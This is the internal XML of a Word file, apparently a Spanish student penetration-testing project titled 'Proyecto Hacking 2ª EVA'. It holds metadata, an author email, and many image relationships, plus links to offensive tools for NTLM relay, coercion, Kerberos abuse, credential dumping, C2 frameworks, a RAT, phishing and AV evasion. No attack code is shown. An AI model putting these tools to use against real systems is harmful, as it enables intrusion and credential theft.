Target="media/image262.png"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27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hyperlink" Target="https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image285.png"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fortra/impacket" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.png"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image306.png"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image327.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.png"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image196.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image233.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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09.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image275.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25.png"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.png"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image296.png"/><Relationship Id="rId352"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unaaldia.hispasec.com/2022/06/dfscoerce.html" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image243.png"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image263.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/icyguider/Nimcrypt2" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BiZken/PhishMailer" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirkjanm/PKINITtools" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/topotam/PetitPotam" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image173.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image286.png"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image307.png"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image328.png"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image177.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image197.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21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github.com/cobbr/Covenant" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image253.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0.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.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76.png"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image297.png"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image318.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27.png"/><Relationship Id="rId276" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image244.png"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image264.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lgandx/Responder" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/skelsec/minikerberos" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/GhostPack/Rubeus" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image266.png"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image287.png"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image308.png"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/icyguider/Nimcrypt2" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.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1.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image198.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image217.png"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image234.png"/><Relationship Id="rId287" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image254.png"/><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1.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image143.png"/><Relationship Id="rId312" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image277.png"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image298.png"/><Relationship Id="rId354" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image319.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4.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.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28.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image245.png"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BiZken/PhishMailer" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lgandx/Responder" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image117.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ParrotSec/mimikatz" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image267.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image288.png"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30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mailto:sanderfene21789@gmail.com" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><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199.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image218.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image235.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image255.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.jpeg"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27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28.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image299.png"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image320.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image189.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/quasar/Quasar" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image229.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image246.png"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image268.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18.png"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31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107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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29.png"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image279.png"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image321.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image84.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image135.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image190.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.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3.png"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image290.png"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/glossaryDocument" Target="glossary/document.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image201.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image237.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48.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image301.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/topic/the-microsoft-net-framework-4-5-2-developer-pack-for-windows-server-2012-r2-windows-8-1-windows-server-2012-windows-8-windows-server-2008-r2-sp1-windows-7-sp1-windows-server-2008-sp2-and-windows-vista-sp2-3fe675dd-2668-0657-a8be-63b7cca08512" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image258.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image270.png"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image312.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.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hyperlink" Target="https://github.com/cobbr/Covenant" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image281.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image323.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image239.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292.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image203.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image212.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0.png"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image303.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image223.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image260.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image272.png"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image314.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33.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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E64288D8DA49EBB8FF4E4861C60961"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{7E5887FE-9DCF-47E2-94EB-4481187D7283}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00A77C68" w:rsidRDefault="00D04B6E" w:rsidP="00D04B6E">
          <w:pPr>
            <w:pStyle w:val="B9E64288D8DA49EBB8FF4E4861C60961"/>
          </w:pPr>
          <w:r w:rsidRPr="00DF027C">
            <w:rPr>
              <w:noProof/>
              <w:lang w:bidi="es-ES"/>
            </w:rPr>
            <w:t>Texto del subtítulo aquí</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="58E9F679AAB646E6BD7C72D21FBBBC7B"/>
        <w:category>
          <w:name w:val="General"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{2BC0A00B-809C-4798-AE20-BE6527971D83}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00E82C5B" w:rsidRDefault="002A78B6" w:rsidP="002A78B6">
          <w:pPr>
            <w:pStyle w:val="58E9F679AAB646E6BD7C72D21FBBBC7B"/>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6E"/>
    <w:rsid w:val="000A7152"/>
    <w:rsid w:val="000B19CA"/>
    <w:rsid w:val="001102FE"/>
    <w:rsid w:val="00126923"/>
    <w:rsid w:val="001323AB"/>
    <w:rsid w:val="00146725"/>
    <w:rsid w:val="0015305E"/>
    <w:rsid w:val="001B6AF8"/>
    <w:rsid w:val="001F1F37"/>
    <w:rsid w:val="00206057"/>
    <w:rsid w:val="00250562"/>
    <w:rsid w:val="002524F5"/>
    <w:rsid w:val="002A313C"/>
    <w:rsid w:val="002A69A8"/>
    <w:rsid w:val="002A78B6"/>
    <w:rsid w:val="002E3654"/>
    <w:rsid w:val="0030764A"/>
    <w:rsid w:val="00365B46"/>
    <w:rsid w:val="004147B4"/>
    <w:rsid w:val="0042266C"/>
    <w:rsid w:val="004775EB"/>
    <w:rsid w:val="004E30AC"/>
    <w:rsid w:val="00553B6B"/>
    <w:rsid w:val="005D7653"/>
    <w:rsid w:val="006C7047"/>
    <w:rsid w:val="006F0E77"/>
    <w:rsid w:val="007543DC"/>
    <w:rsid w:val="007C209F"/>
    <w:rsid w:val="00875844"/>
    <w:rsid w:val="008A3651"/>
    <w:rsid w:val="008A7771"/>
    <w:rsid w:val="008B2A18"/>
    <w:rsid w:val="008B33A5"/>
    <w:rsid w:val="008E7D44"/>
    <w:rsid w:val="008F41C0"/>
    <w:rsid w:val="0098226C"/>
    <w:rsid w:val="00A64651"/>
    <w:rsid w:val="00A65648"/>
    <w:rsid w:val="00A77C68"/>
    <w:rsid w:val="00A91F4B"/>
    <w:rsid w:val="00AB6CBC"/>
    <w:rsid w:val="00B341E5"/>
    <w:rsid w:val="00C65C13"/>
    <w:rsid w:val="00CC6CFF"/>
    <w:rsid w:val="00D04B6E"/>
    <w:rsid w:val="00D65125"/>
    <w:rsid w:val="00D829EB"/>
    <w:rsid w:val="00DD4481"/>
    <w:rsid w:val="00DD5F4F"/>
    <w:rsid w:val="00DE08A2"/>
    <w:rsid w:val="00E11009"/>
    <w:rsid w:val="00E27CDD"/>
    <w:rsid w:val="00E55F8B"/>
    <w:rsid w:val="00E62DDE"/>
    <w:rsid w:val="00E82C5B"/>
    <w:rsid w:val="00EA0AB3"/>
    <w:rsid w:val="00F75840"/>
    <w:rsid w:val="00FB7608"/>
    <w:rsid w:val="00FF1072"/>
    <w:rsid w:val="00FF7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E64288D8DA49EBB8FF4E4861C60961">
    <w:name w:val="B9E64288D8DA49EBB8FF4E4861C60961"/>
    <w:rsid w:val="00D04B6E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="58E9F679AAB646E6BD7C72D21FBBBC7B">
    <w:name w:val="58E9F679AAB646E6BD7C72D21FBBBC7B"/>
    <w:rsid w:val="002A78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2FDC0-514B-4722-958B-C6A1BB93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35</Pages>
  <Words>19365</Words>
  <Characters>106513</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Proyecto Hacking 2ª EVA</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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Hacking 2ª EVA</dc:title>
  <dc:subject>Análisis de seguridad en redes y sistemas</dc:subject>
  <dc:creator>ALESANDER Martinez Seijo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sander7 Martinez Seijo</cp:lastModifiedBy>
  <cp:revision>95</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-17T09:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-22T05:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>